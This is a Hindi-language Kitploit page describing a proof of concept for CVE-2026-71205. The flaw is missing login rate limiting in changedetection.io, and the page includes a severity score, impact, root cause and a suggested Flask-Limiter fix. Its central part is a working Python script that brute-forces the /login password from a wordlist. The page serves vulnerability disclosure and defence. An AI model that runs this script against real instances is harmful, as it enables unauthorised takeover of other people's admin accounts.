Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-71205-PoC — PoC: changedetection.io असीमित लॉगिन ब्रूट-फोर्स, रेट लिमिटिंग के बिना (CVE-2026-71205, मध्यम 6.5) | Kitploit
उपकरण/GitHubGitHub/nel-droid/cve-2026-71205-poc
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubnel-droid/cve-2026-71205-poc

CVE-2026-71205-PoC

PoC: changedetection.io असीमित लॉगिन ब्रूट-फोर्स, रेट लिमिटिंग के बिना (CVE-2026-71205, मध्यम 6.5)

रिपॉजिटरी देखें
624 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-71205 — changedetection.io: /login पर रेट लिमिटिंग न होने से असीमित पासवर्ड ब्रूट-फोर्स संभव

उत्पाद: dgtlmoon/changedetection.io — v0.55.7 फ़ाइल: changedetectionio/flask_app.py CWE: CWE-307 — अत्यधिक प्रमाणीकरण प्रयासों का अनुचित प्रतिबंध CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N — 6.5 (मध्यम) CNA: Turan Security · CVE रिकॉर्ड

विवरण

changedetection.io का /login रूट प्रस्तुत किए गए पासवर्ड की जाँच एकल PBKDF2-HMAC-SHA256 हैश के विरुद्ध करता है, जिसमें प्रति-IP या प्रति-सेशन रेट लिमिटिंग, असफल-प्रयास काउंटर, या लॉकआउट नहीं होता। requirements.txt में कोई रेट-लिमिटिंग लाइब्रेरी मौजूद नहीं है।

प्रभाव

एक हमलावर बिना किसी थ्रॉटलिंग के एकल-एडमिन लॉगिन के विरुद्ध असीमित पासवर्ड अनुमान लगा सकता है, जिससे नेटवर्क राउंड-ट्रिप के अलावा किसी भी लागत के बिना इंस्टेंस के एकमात्र खाते पर ऑनलाइन ब्रूट-फोर्स या क्रेडेंशियल-स्टफिंग हमले संभव हो जाते हैं।

पुनरुत्पादन (PoC)

root@kitploit:~
import requests
import itertools
import sys

target = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"
wordlist = sys.argv[2] if len(sys.argv) > 2 else "passwords.txt"

session = requests.Session()

with open(wordlist) as f:
    for line_no, password in enumerate(f, 1):
        password = password.strip()
        resp = session.post(
            f"{target}/login",
            data={"password": password},
            allow_redirects=False,
            timeout=10,
        )
        # No lockout, no rate-limit headers, no CAPTCHA at any attempt count.
        status = "SUCCESS" if resp.status_code in (302, 303) else "fail"
        print(f"[{line_no}] {password!r}: {status} (HTTP {resp.status_code})")
        if status == "SUCCESS":
            print(f"[+] Valid password found: {password}")
            break

किसी भी पासवर्ड वर्डलिस्ट के साथ इंस्टेंस पर चलाएँ — रन के किसी भी चरण में कोई भी प्रयास-संख्या लॉकआउट, CAPTCHA, या बढ़ती देरी को ट्रिगर नहीं करती।

मूल कारण

लॉगिन हैंडलर बिना किसी प्रयास-ट्रैकिंग स्थिति (प्रति-IP, प्रति-सेशन, या वैश्विक) के सीधे हैश तुलना करता है, और कोई रेट-लिमिटिंग मिडलवेयर/लाइब्रेरी स्थापित नहीं है।

सुधार अनुशंसा

/login पर एक रेट-लिमिटिंग लाइब्रेरी (जैसे Flask-Limiter) जोड़ें, जिसमें प्रति स्रोत IP/सेशन के लिए असफल-प्रयास काउंटर और एक्सपोनेन्शियल बैकऑफ़ या अस्थायी लॉकआउट शामिल हो।

टूल डाउनलोड करें